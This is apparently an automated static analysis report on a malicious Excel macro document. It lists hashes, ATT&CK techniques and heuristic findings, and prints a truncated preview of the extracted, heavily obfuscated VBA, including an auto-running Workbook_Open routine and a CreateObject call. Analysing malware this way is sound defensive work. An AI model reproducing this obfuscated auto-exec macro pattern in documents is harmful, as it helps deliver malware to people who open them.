Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 dc5e9fa588a2d026…

MALICIOUS

Office (OOXML)

Size: 27.8 KB | Created: 2018-10-21 17:29:00 UTC | Authoring application: Microsoft Excel 12.0000 | First seen: 2019-04-18
MD5: 88014768aed4f278dc4764b350238177
SHA-1: b37d5217ef6f2fc2a73ef1a9d05ca86741353287
SHA-256: dc5e9fa588a2d0268fe294fef2535818d4c3a52575783e0ae2e8ed7adbd4ec10
Risk Score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic | T1566.001 Spearphishing Attachment | T1204.002 Malicious File

The file is an OOXML document containing a Workbook_Open macro, which is a common technique for executing malicious code upon opening. The VBA code is heavily obfuscated with numerous loops and meaningless variable names, but the presence of `Shell()` and `CreateObject()` calls, along with the `OLE_VBA_PCODE_AUTOEXEC_EXEC` heuristic, strongly suggests it attempts to download and execute a second-stage payload. The obfuscation and lack of clear indicators prevent confident family attribution.

Heuristics 6

  • VBA project inside OOXML [medium] OOXML_VBA (4 related findings)
    Document contains a VBA project: VBA macros present
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15378 bytes
SHA-256: d58f7f82f5839cf478547cc0b50af6b9d8e40008efc506f593c414ad6cc623f7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
fDwGJzIniARp.ZHs2xHASJ9RG6zhgX_55
While 26 = 4367
Dim zbgnsr_F8VWs_8bz1OLD6j9FYZUI6sC5rP48j_HEH3UxjhB8WqoHwz8Nb As Variant
Wend
Dim ZNQVyJNRb_ As Integer
While 8 = 9621
Dim xCcOvFF5CNIezWVvMC3G2RndIyzsRqFdGhM43a3Bp54_Q4 As Variant
Wend
Dim W49C7JXTGdW As Integer
While 6 = 517
Dim E6PVlTFoWQHa2uI1a6XnKNa5sNt6_v As Variant
Wend
Dim Zse5U6uRRh As Integer
While 12 = 9984
Dim leEtfJJAg3JEsuzdTmVjJikzY67YL_GmyuisTJKDi5 As Variant
Wend
Dim g3NlvHdaZn58 As Integer

While 28 = 5262
Dim qB4NSjMtwatfP7KFHHZQ_OBqkvHw5u As Variant
Wend
Dim nbrzDgyEzkzxF As Integer
While 2 = 4391
Dim HqUx7WRPMl8Z9KmfZYyBvPxZ3nQBRyaKG6h3ZT As Variant
Wend
Dim yfaWN_1lglbR As Integer
While 16 = 381
Dim IY8_Q1344REO7XJuRBlsE_jRiXBrhPEni_nALBnq_eYfZJYz4_Rd9rLD As Variant
Wend
Dim yoe3xIUmKZp7sH As Integer
While 21 = 6966
Dim hOW5sioC1X8Kxb7knzviKfft2yIvS_caEufCFD9lXvxE4lT As Variant
Wend
Dim ojuyIH6Arm As Integer
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "fDwGJzIniARp"
Dim yaQsE5FicH4h1ahqPEq6Qu8TSDJutLnvfChMtAEvip_TAKgMTToa5SjDb7XBsUyOcGAx2T7N94UjomRGe7YYfK1KaduvkDBM1xz3IsT_VZa_8_WymPev5 As String
 Function B3Y2r14e_C64dj1IIYrZyNdPFsMnQ6xdSbAELfC7KWfQ6tEJ8_9(ixjvwWmVSVwzOuBSXnhTbP_c1pwHMYx6XpCtLqqPhc6tYp4B6hlP)
While 22 = 1917
Dim pNS8rRZaYSBWDA93k8AsTqwFPEIO4IIvI_PjUksqLe As Variant
Wend
Dim v_X3T_HXlMvn As Integer
While 5 = 4739
Dim r9aKpkHJgOHOMCsXf_NSey4wrWtHEdg69dPQGI4GgB7f As Variant
Wend
Dim zHnQOt2l9bH As Integer

 Dim aEeQqbb6MNpstTwMiZiO5qdXigxdjJ9PtrGLMlS3fojbFW3xrFX1_RzsjEqIn8TCOY8BKi_7EpsNFAQKn9ucvGKZ1WkF4IMgSgLqXzkGEatWikliwdenK1OGLfIx82B6aJ4
While 2 = 8070
Dim DncRz_DBrLOrvaOV_Evb1W6irb2Ul46fUVLcpkPg84xl26d As Variant
Wend
Dim xddf2ooBoq3iW As Integer
While 13 = 9366
Dim FqYwOsUXMvpbyNc6iSpv8D1FVDzoTguvB2YOd As Variant
Wend
Dim UHi_iqxCBZK_ As Integer


   Dim PBl7CcN7qJTX3u5QinPxpW7iTvzKWhUtvY19cEIBiMLDdraWYurBubo2_BlPmCiHxilc36xbdMNaJ3_kSbulyS9Rs93Zc2XfmCN5E8cc7OffLLqJ7_6IP7SdjRs4BV9kyrxFmHeU8Qoiv
While 13 = 1259
Dim EWLvXCzRYK2pDpA3Z6xMah7fL2dHQRAXcNZVhNbUXKjIO2A2p4k_k7mfZoh As Variant
Wend
Dim fhp_EIcKyNmT As Integer
While 20 = 4238
Dim KbbxO8wPT1kbWp6vej462o6wrJc9vpKlCiYkHHWhlXMo6MlXMp As Variant
Wend
Dim oMTpaefoEDc As Integer
   
While 12 = 6128
Dim xcmo9YwPSmVLTRbaPzchDt__7PUF4_cCRDx5i_7xxG4CR_9V8 As Variant
Wend
Dim DOxldXCWmqqC As Integer
While 17 = 1216
Dim oVNIS3Pdg1O3nt6yBp7Q8GyxnYwntf6RNuGuo29Er2 As Variant
Wend
Dim ZL947tbMU7 As Integer
 Set PBl7CcN7qJTX3u5QinPxpW7iTvzKWhUtvY19cEIBiMLDdraWYurBubo2_BlPmCiHxilc36xbdMNaJ3_kSbulyS9Rs93Zc2XfmCN5E8cc7OffLLqJ7_6IP7SdjRs4BV9kyrxFmHeU8Qoiv = CreateObject(yaQsE5FicH4h1ahqPEq6Qu8TSDJutLnvfChMtAEvip_TAKgMTToa5SjDb7XBsUyOcGAx2T7N94UjomRGe7YYfK1KaduvkDBM1xz3IsT_VZa_8_WymPev5)
While 7 = 5861
Dim sY_ffYe3_kt_57n3lJIHqzh_qlysbCKfJ8hyojM As Variant
Wend
Dim OV__EGYPAODGP As Integer
While 15 = 635
Dim DKN2z9y4iuZB
... (truncated)
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 44032 bytes
SHA-256: 07d8b38a00b759beb813e7131f35eed1c116ce1dc819d002a1d763063d1a1b1f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 long base64-like blob(s).